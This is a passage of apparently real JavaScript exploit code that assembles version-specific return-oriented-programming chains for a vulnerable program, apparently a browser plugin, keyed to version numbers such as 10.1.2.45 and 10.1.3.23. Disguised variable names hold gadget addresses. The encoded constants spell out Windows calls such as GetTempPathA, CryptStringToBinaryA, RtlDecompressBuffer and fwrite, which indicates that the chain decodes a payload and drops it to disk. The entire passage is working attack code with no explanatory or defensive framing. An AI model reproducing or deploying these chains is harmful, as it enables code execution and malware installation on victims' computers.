r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x532422\);r+=ue\(t+0x532422\);\n        r+=ue\(t+0x5e8d02\);\n        r+=ue\(0xcccc0614\);\n        r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);\n        r+=ue\(t+0x46c3ea\);r+=ue\(t+0x5ec5fc\);r+=ue\(t+0x81305e\);r+=ue\(t+0x464e10\);r+=ue\(t+0x532422\);\n        r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc05f4\);\n        r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(0x42424242\);r+=ue\(t+0x500302\);r+=ue\(0x43434343\);\n        r+=ue\(0x44444444\);r+=ue\(0x44444444\);r+=ue\(0x45454545\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed668\);r+=ue\(t+0x1df01\);\n        r+=ue\(t+0x527b82\);r+=ue\(0x45454545\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed214\);r+=ue\(t+0x4b0548\);r+=ue\(t+0x813101\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed0c0\);r+=ue\(t+0x4b0548\);\n        r+=ue\(t+0x17\);r+=ue\(0x1010101\);r+=ue\(0x6f004d\);\n        r+=ue\(0x750064\);r+=ue\(0x65006c\); ROP_ADD_ESP_4 = 0x20c6f75b;\n        bENEDETTO = 0x20d7b55d;\n        cARPONE = 0x20d01302;\n        sENTIRSI = 0x20cf968e;\n        rICINGHE = 0x20ceb42c;\n        aPPARENZA = 0x2080df4a;\n        fISAMENTE = 0x20d347ab;\n        pRESUNSI = 0x20801017;\n        oRDERED = 0x20ce9a1f;\n        cOCOLLE = 0x20891b8d;\n    } else if\(pRENDENDO == '10.1.2.45'\){\n        var r="";\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x41bc90\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818001\);r+=ue\(t+0x5efb29\);r+=ue\(0x54746547\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818005\);r+=ue\(t+0x5efb29\);r+=ue\(0x50706d65\);\n        r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818009\);r+=ue\(t+0x5efb29\);r+=ue\(0x41687461\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x81800d\);r+=ue\(t+0x5efb29\);r+=ue\(0x41414100\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);\n        r+=ue\(t+0x81800e\);r+=ue\(t+0x5efb29\);r+=ue\(0x69727766\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818012\);r+=ue\(t+0x5efb29\);\n        r+=ue\(0x41006574\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818015\);r+=ue\(t+0x5efb29\);r+=ue\(0x41006277\);r+=ue\(t+0x46d6ca\);\n        r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818018\);r+=ue\(t+0x5efb29\);r+=ue\(0x70797243\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x81801c\);r+=ue\(t+0x5efb29\);\n        r+=ue\(0x72745374\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818020\);r+=ue\(t+0x5efb29\);r+=ue\(0x54676e69\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);\n        r+=ue\(t+0x818024\);r+=ue\(t+0x5efb29\);r+=ue\(0x6e69426f\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818028\);r+=ue\(t+0x5efb29\);r+=ue\(0x41797261\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x81802c\);r+=ue\(t+0x5efb29\);r+=ue\(0x41414100\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x81802d\);r+=ue\(t+0x5efb29\);r+=ue\(0x6c64746e\);\n        r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818031\);r+=ue\(t+0x5efb29\);r+=ue\(0x4141006c\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818033\);r+=ue\(t+0x5efb29\);\n        r+=ue\(0x446c7452\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818037\);r+=ue\(t+0x5efb29\);\n        r+=ue\(0x6d6f6365\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);\n        r+=ue\(t+0x81803b\);\n        r+=ue\(t+0x5efb29\);r+=ue\(0x73657270\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x81803f\);r+=ue\(t+0x5efb29\);r+=ue\(0x66754273\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818043\);r+=ue\(t+0x5efb29\);r+=ue\(0x726566\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x818047\);r+=ue\(t+0x5efb29\);r+=ue\(0x73736377\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x81804b\);r+=ue\(t+0x5efb29\);r+=ue\(0x41007274\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc0240\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x538c1d\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc023c\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f1214\);\n        r+=ue\(t+0x4b1788\);r+=ue\(t+0x816e96\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc022c\);r+=ue\(t+0x4225cc\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);\n        r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1788\);r+=ue\(0x41414141\);r+=ue\(t+0x818047\);r+=ue\(t+0x154a\);r+=ue\(t+0x5ec1a0\);r+=ue\(0x41414141\);r+=ue\(t+0x60a990\);r+=ue\(t+0x2df56d\);r+=ue\(t+0x508c23\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x81805e\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x508c23\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x81804e\);\n        r+=ue\(t+0x5efb29\);r+=ue\(0x1010101\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1788\);r+=ue\(t+0x817030\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc02ac\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1788\);r+=ue\(0x41414141\);r+=ue\(t+0x818018\);r+=ue\(t+0x57c7ce\);r+=ue\(t+0x5efb29\);r+=ue\(t+0x81805e\);r+=ue\(t+0x465f20\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc033c\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x502076\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc0340\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x502076\);r+=ue\(t+0x5d72b8\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);\n        r+=ue\(0xcccc0344\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x57c7ce\);r+=ue\(t+0x154a\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x42424242\);r+=ue\(0x43434343\);r+=ue\(t+0x818066\);r+=ue\(t+0x81804e\);r+=ue\(t+0x818056\);r+=ue\(t+0x81805a\);r+=ue\(t+0x502076\);r+=ue\(t+0x5d72b8\);\n        r+=ue\(t+0x5d72b8\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc0428\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x5efb29\);r+=ue\(t+0x81804e\);r+=ue\(t+0x465f20\);\n        r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc0438\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x5efb29\);r+=ue\(t+0x81805e\);r+=ue\(t+0x465f20\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc042c\);\n        r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1788\);r+=ue\(t+0x81802d\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc0418\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1788\);r+=ue\(0x41414141\);r+=ue\(t+0x818033\);r+=ue\(t+0x154a\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x44444444\);r+=ue\(0x1010101\);\n        r+=ue\(t+0x818066\);r+=ue\(0x43434343\);r+=ue\(t+0x818052\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1788\);r+=ue\(t+0x816e96\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc047c\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1788\);r+=ue\(0x41414141\);r+=ue\(t+0x81800e\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc05ec\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);\n        r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1788\);r+=ue\(t+0x60a4fc\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc04e0\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1788\);r+=ue\(0x41414141\);r+=ue\(t+0x818001\);r+=ue\(t+0x154a\);r+=ue\(t+0x17\);r+=ue\(0x1010101\);r+=ue\(t+0x818101\);r+=ue\(t+0x5efb29\);r+=ue\(t+0x818101\);r+=ue\(t+0x4f16f4\);r+=ue\(t+0x5efb29\);r+=ue\(0x542e44\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x502076\);r+=ue\(t+0x5d72b8\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc05f8\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x5efb29\);r+=ue\(t+0x818052\);\n        r+=ue\(t+0x465f20\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);\n        r+=ue\(0xcccc05fc\);\n        r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f165c\);\n        r+=ue\(t+0x1dee7\);r+=ue\(t+0x5ec1a0\);r+=ue\(t+0x818101\);r+=ue\(t+0x818015\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc0600\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x508c23\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc0614\);r+=ue\(t+0x4225cc\);r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(t+0x5efb29\);r+=ue\(t+0x81805e\);r+=ue\(t+0x465f20\);r+=ue\(t+0x508c23\);r+=ue\(t+0x5ec230\);r+=ue\(0xcccc05f4\);r+=ue\(t+0x4225cc\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13ca8b\);r+=ue\(t+0x25e883\);r+=ue\(t+0x46d6ca\);r+=ue\(0x42424242\);r+=ue\(t+0x5012b3\);r+=ue\(0x43434343\);r+=ue\(0x44444444\);r+=ue\(0x44444444\);r+=ue\(0x45454545\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f1668\);r+=ue\(t+0x1dee7\);\n        r+=ue\(t+0x51f5fd\);r+=ue\(0x45454545\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1788\);r+=ue\(t+0x818101\);r+=ue\(t+0x51f5fd\);r+=ue\(t+0x5f10c0\);\n        r+=ue\(t+0x4b1788\);r+=ue\(t+0x17\);r+=ue\(0x1010101\);r+=ue\(0x6f004d\);r+=ue\(0x750064\);r+=ue\(0x65006c\); ROP_ADD_ESP_4 = 0x20c709bb;\n        bENEDETTO = 0x20d7c5ad;\n        cARPONE = 0x20d022b3;\n        sENTIRSI = 0x20cfa63f;\n        rICINGHE = 0x20cec3dd;\n        aPPARENZA = 0x2080df51;\n        fISAMENTE = 0x20d18753;\n        pRESUNSI = 0x20801017;\n        oRDERED = 0x20cea9bf;\n        cOCOLLE = 0x2089209e;\n    } else if\(pRENDENDO == '10.1.3.23'\){\n        var r="";\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x41bf0a\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818001\);\n        r+=ue\(t+0x5f00d9\);r+=ue\(0x54746547\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818005\);r+=ue\(t+0x5f00d9\);r+=ue\(0x50706d65\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818009\);\n        r+=ue\(t+0x5f00d9\);r+=ue\(0x41687461\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x81800d\);r+=ue\(t+0x5f00d9\);r+=ue\(0x41414100\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x81800e\);r+=ue\(t+0x5f00d9\);r+=ue\(0x69727766\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818012\);r+=ue\(t+0x5f00d9\);\n        r+=ue\(0x41006574\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818015\);r+=ue\(t+0x5f00d9\);r+=ue\(0x41006277\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818018\);r+=ue\(t+0x5f00d9\);r+=ue\(0x70797243\);r+=ue\(t+0x46d8aa\);\n        r+=ue\(t+0x558d40\);r+=ue\(t+0x81801c\);r+=ue\(t+0x5f00d9\);r+=ue\(0x72745374\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818020\);r+=ue\(t+0x5f00d9\);r+=ue\(0x54676e69\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818024\);r+=ue\(t+0x5f00d9\);r+=ue\(0x6e69426f\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818028\);r+=ue\(t+0x5f00d9\);r+=ue\(0x41797261\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x81802c\);r+=ue\(t+0x5f00d9\);r+=ue\(0x41414100\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x81802d\);r+=ue\(t+0x5f00d9\);r+=ue\(0x6c64746e\);r+=ue\(t+0x46d8aa\);\n        r+=ue\(t+0x558d40\);r+=ue\(t+0x818031\);r+=ue\(t+0x5f00d9\);r+=ue\(0x4141006c\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);\n        r+=ue\(t+0x818033\);r+=ue\(t+0x5f00d9\);r+=ue\(0x446c7452\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818037\);r+=ue\(t+0x5f00d9\);r+=ue\(0x6d6f6365\);r+=ue\(t+0x46d8aa\);\n        r+=ue\(t+0x558d40\);r+=ue\(t+0x81803b\);r+=ue\(t+0x5f00d9\);\n        r+=ue\(0x73657270\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x81803f\);r+=ue\(t+0x5f00d9\);r+=ue\(0x66754273\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818043\);r+=ue\(t+0x5f00d9\);r+=ue\(0x726566\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x818047\);r+=ue\(t+0x5f00d9\);r+=ue\(0x73736377\);\n        r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x81804b\);r+=ue\(t+0x5f00d9\);r+=ue\(0x41007274\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc0240\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x51710b\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc023c\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1e51\);\n        r+=ue\(t+0x8170f2\);\n        r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc022c\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1e51\);r+=ue\(0x41414141\);r+=ue\(t+0x818047\);r+=ue\(t+0x14de\);\n        r+=ue\(t+0x5ec746\);r+=ue\(0x41414141\);r+=ue\(t+0x60a990\);r+=ue\(t+0x2df2b4\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x558d40\);r+=ue\(t+0x81805e\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x558d40\);\n        r+=ue\(t+0x81804e\);\n        r+=ue\(t+0x5f00d9\);\n        r+=ue\(0x1010101\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1e51\);\n        r+=ue\(t+0x81728c\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc02ac\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f11d4\);r+=ue\(t+0x4b1e51\);r+=ue\(0x41414141\);r+=ue\(t+0x818018\);r+=ue\(t+0x4fabb0\);r+=ue\(t+0x5f00d9\);r+=ue\(t+0x81805e\);r+=ue\(t+0x46efc0\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc033c\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x502518\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc0340\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);\n        r+=ue\(t+0x46d8aa\);r+=ue\(t+0x502518\);r+=ue\(t+0x52874e\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc0344\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);\n        r+=ue\(t+0x4fabb0\);r+=ue\(t+0x14de\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x42424242\);r+=ue\(0x43434343\);r+=ue\(t+0x818066\);r+=ue\(t+0x81804e\);r+=ue\(t+0x818056\);r+=ue\(t+0x81805a\);r+=ue\(t+0x502518\);\n        r+=ue\(t+0x52874e\);r+=ue\(t+0x52874e\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc0428\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x5f00d9\);r+=ue\(t+0x81804e\);r+=ue\(t+0x46efc0\);r+=ue\(t+0x4c9d86\);\n        r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc0438\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x5f00d9\);r+=ue\(t+0x81805e\);r+=ue\(t+0x46efc0\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc042c\);\n        r+=ue\(t+0x422568\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1e51\);r+=ue\(t+0x81802d\);r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc0418\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);r+=ue\(t+0x13b7be\);r+=ue\(t+0x3caf6d\);r+=ue\(t+0x46d8aa\);\n        r+=ue\(t+0x558d40\);r+=ue\(t+0x5f11d4\);\n        r+=ue\(t+0x4b1e51\);r+=ue\(0x41414141\);r+=ue\(t+0x818033\);r+=ue\(t+0x14de\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x44444444\);r+=ue\(0x1010101\);r+=ue\(t+0x818066\);r+=ue\(0x43434343\);r+=ue\(t+0x818052\);r+=ue\(t+0x558d40\);r+=ue\(t+0x5f1214\);r+=ue\(t+0x4b1e51\);r+=ue\(t+0x8170f2\);\n        r+=ue\(t+0x4c9d86\);r+=ue\(t+0x5ec7d6\);r+=ue\(0xcccc047c\);r+=ue\(t+0x422568\);r+=ue\(t+0x17\);\n        